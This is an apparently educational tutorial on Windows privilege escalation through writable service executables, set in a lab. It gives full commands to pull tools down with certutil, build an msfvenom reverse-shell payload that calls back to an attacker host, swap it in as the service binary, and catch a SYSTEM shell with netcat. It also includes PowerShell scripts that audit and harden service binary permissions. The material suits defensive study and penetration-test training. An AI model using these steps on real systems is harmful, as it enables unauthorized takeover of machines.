Windows Privilege Escalation
Understanding Windows privilege escalation is a key aspect of cybersecurity. Privilege escalation is a technique used by attackers to gain elevated privileges on a system. For security professionals, knowing how it works matters because it helps them find, exploit and fix the underlying vulnerabilities in their Windows systems.
This post is part of my Windows Privilege Escalation series that I’ve been posting. I’ll be uploading new content every week.
What are Weak Service File Permissions?
Service executables are files that run in the background and provide various services, such as handling network requests, printing documents, or monitoring system events. An insecure service executable is one whose file permissions are weak enough to let it be replaced with a malicious file; when the service starts, the malicious file runs in place of the original executable. For this exploit to work, you need the rights to modify the service executable and a way to make the service start or restart.
If a modifiable service executable runs with the same privileges as the user you currently have a shell as, it is not considered insecure: a reverse shell obtained that way would not elevate your privileges, it would just return a shell with the same level of privileges you already had.
Example: You have a user level shell as John and you found a service named service123 which is running an executable that can be replaced by John. The service service123 is also running with Administrator privileges. You replace the service executable with your own reverse shell executable. After replacing the service executable, the next step is to start/restart service123 which will run the malicious executable with Administrator privileges.
Demonstration
Tools used:
Winpeas.exe | accesschk.exe | msfvenom
Scenario: We have obtained a shell as the user mmorbius and must figure out a way to escalate our privileges.
First, bring over tools to enumerate the machine. Host a Python web server on Kali to transfer the tools.
python3 -m http.server 80
Then download the tool winpeas.exe to the Windows machine using the command line tool certutil.exe built into Windows. I used winpeas.exe A LOT while prepping for the OSCP; it's a really handy tool for finding privilege escalation vulnerabilities in Windows.
certutil.exe -urlcache -f http://<IP>/winpeas.exe winpeas.exe
Run winpeas.exe with the option “servicesinfo”. You can run it with no options, but that makes the output pretty large, so this option is useful if you’re only looking for service vulnerabilities.
.\winpeas.exe servicesinfo
In the winpeas output, we can see that there is a service named vulnserv whose executable our current user can modify.
Checking what privileges the service runs with by running sc qc vulnserv shows that this service runs as LocalSystem. The executable the service runs is located at C:\Services\vulnerable.exe.
sc qc vulnserv
Then download accesschk.exe to the Windows machine using certutil.exe and use it to check the permissions mmorbius has on the vulnerable service executable.
certutil.exe -urlcache -f http://<IP>/accesschk.exe accesschk.exe
As the accesschk output shows, mmorbius has FILE_ALL_ACCESS to the service executable.
accesschk.exe /accepteula -quvw C:\Services\vulnerable.exe
Now that we know we have permissions to modify the executable, the next step is to replace the vulnerable executable with our own reverse shell executable.
Create the reverse shell executable using msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=53 -f exe > reverse.exe
Copy the reverse shell to the Windows machine.
certutil.exe -urlcache -f http://<IP>/reverse.exe reverse.exe
Create a backup of the service executable before copying the reverse shell to the location of the service executable. Make sure to name the reverse shell executable the same as the service executable.
move C:\Services\vulnerable.exe vulnerable.exe.bak
move reverse.exe C:\Services\vulnerable.exe
Start a netcat listener on whichever port you specified in msfvenom.
nc -lnvp 53
Now do “net start vulnserv” to start the service with the new executable in place.
net start vulnserv
Back on the netcat listener, there should be a shell running as NT AUTHORITY\SYSTEM.
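The winpeas and accesschk steps above find one writable service binary by hand. The following PowerShell script is an added audit example, not code from the original post or from the winpeas/accesschk projects: it walks every installed service, resolves the binary path from the service's PathName (quoted or unquoted), reads the file ACL, and reports any Allow ACE that grants write-type rights to a low-privileged principal, together with the account the service runs as. The list of low-privileged principals and the regex used to decide that a service account is "elevated" are assumptions for a typical host; adjust them for your environment.

```powershell
# Added audit script (not part of the original post). Reports service binaries
# that low-privileged principals can replace, and whether the service account
# outranks a normal user. Run it as the user you are assessing.

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # Quoted path: take what sits between the first pair of quotes.
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    # Unquoted path: take everything up to the first .exe (keeps spaces intact).
    if ($PathName -match '^\s*(.+?\.exe)(\s|$)') { return $Matches[1] }
    return ($PathName -split '\s+')[0]
}

function Find-WritableServiceBinary {
    param(
        # Assumption: these principals are considered low-privileged. Only ACEs
        # naming them (or the current user) are flagged; membership of other
        # groups is not resolved, so extend the list for your environment.
        [string[]]$LowPrivPrincipals = @(
            'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
            'NT AUTHORITY\INTERACTIVE',
            [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
        )
    )
    # Any of these rights lets the file be replaced or its ACL rewritten.
    $writeMask = [int][System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, Delete, ChangePermissions, TakeOwnership'
    # Some ACEs carry raw generic rights; GENERIC_WRITE and GENERIC_ALL count too.
    $writeMask = $writeMask -bor 0x40000000 -bor 0x10000000

    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $exe = Get-ServiceBinaryPath $svc.PathName
        if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { continue }
        try { $acl = Get-Acl -LiteralPath $exe -ErrorAction Stop } catch { continue }

        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            if (([int]$ace.FileSystemRights -band $writeMask) -eq 0) { continue }

            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                # Assumption: LocalSystem, NT AUTHORITY\* and NT SERVICE\* accounts
                # outrank an ordinary user, so replacing the binary is an escalation.
                Elevated  = $svc.StartName -match '^(LocalSystem|NT AUTHORITY\\|NT SERVICE\\)'
                Binary    = $exe
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

# Only the Elevated rows are escalation paths; the rest are still ACL hygiene findings.
Find-WritableServiceBinary | Where-Object Elevated | Format-Table -AutoSize
```

On the lab machine from this post the output would contain one row: vulnserv, running as LocalSystem, with mmorbius holding FullControl on C:\Services\vulnerable.exe. Pair the result with the service's own DACL (sc sdshow <name>) to confirm whether the same user can also start or stop the service, which is the second condition for the technique.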
Recreate Vulnerability
Tools used: subinacl.exe
First, create the service as an Admin. To do this you need a cmd shell as an Admin.
sc.exe create vulnserv binPath= "C:\Services\vulnerable.exe"
An executable named “vulnerable.exe” placed in C:\Services will be executed when vulnserv is started. (Note that sc.exe requires a space after binPath=.)
The next step is to grant a user permissions to modify the service. The tool SubInACL.exe lets you modify service permissions.
Use subinacl.exe to give the user mmorbius permissions to modify the service.
subinacl.exe /service vulnserv /grant=mmorbius=PTOC
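The subinacl grant above changes the DACL of the service object (start, stop, pause and change-configuration rights), while the accesschk step in the demonstration checks the file ACL of the executable; a fix has to cover both. The following PowerShell is an added hardening example for the lab service from this post, not code from the original post or from the SubInACL/icacls tools' documentation. It assumes the post's names (vulnserv, C:\Services\vulnerable.exe, user mmorbius), an elevated shell, and that subinacl.exe is on the PATH; the trusted-principal list in Test-ServiceBinaryAcl is an assumption.

```powershell
# Added hardening example (not part of the original post). Resets the file ACL
# on the service binary and its folder, revokes the service-object rights the
# lab setup granted, then verifies that no non-admin principal can still write
# the binary. Run from an elevated shell.

$svcName = 'vulnserv'
$exe     = 'C:\Services\vulnerable.exe'
$dir     = Split-Path -Path $exe -Parent

# 1. File and folder ACL: drop inherited ACEs, give SYSTEM and Administrators
#    full control, give Users read/execute only, and strip any explicit grant
#    to mmorbius (a no-op if none exists).
icacls $dir /inheritance:r /grant:r 'SYSTEM:(OI)(CI)F' 'Administrators:(OI)(CI)F' 'Users:(OI)(CI)RX'
icacls $exe /inheritance:r /grant:r 'SYSTEM:F' 'Administrators:F' 'Users:RX'
icacls $dir /remove mmorbius
icacls $exe /remove mmorbius

# 2. Service object DACL: revoke the PTOC rights granted with subinacl, then
#    print the resulting SDDL so the remaining ACEs can be reviewed.
subinacl.exe /service $svcName /revoke=mmorbius
sc.exe sdshow $svcName

# 3. Verify the file ACL. Returns $true only if no Allow ACE grants write-type
#    rights to a principal outside the trusted set; offending ACEs are printed.
function Test-ServiceBinaryAcl {
    param(
        [string]$Path,
        # Assumption: only these principals may legitimately write a service binary.
        [string[]]$TrustedPrincipals = @(
            'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT SERVICE\TrustedInstaller'
        )
    )
    $writeMask = [int][System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, Delete, ChangePermissions, TakeOwnership'
    $writeMask = $writeMask -bor 0x40000000 -bor 0x10000000   # GENERIC_WRITE | GENERIC_ALL

    $bad = (Get-Acl -LiteralPath $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $TrustedPrincipals -notcontains $_.IdentityReference.Value -and
        (([int]$_.FileSystemRights -band $writeMask) -ne 0)
    }
    if ($bad) { $bad | Format-Table IdentityReference, FileSystemRights -AutoSize | Out-Host }
    return (-not $bad)
}

Test-ServiceBinaryAcl -Path $exe
```

Re-run the accesschk command from the demonstration afterwards (accesschk.exe /accepteula -quvw C:\Services\vulnerable.exe) and it should no longer list mmorbius with write access. The same pattern, applying a restrictive ACL to the service's install directory rather than only to the .exe, is what prevents the issue from reappearing when the binary is updated or replaced by an installer.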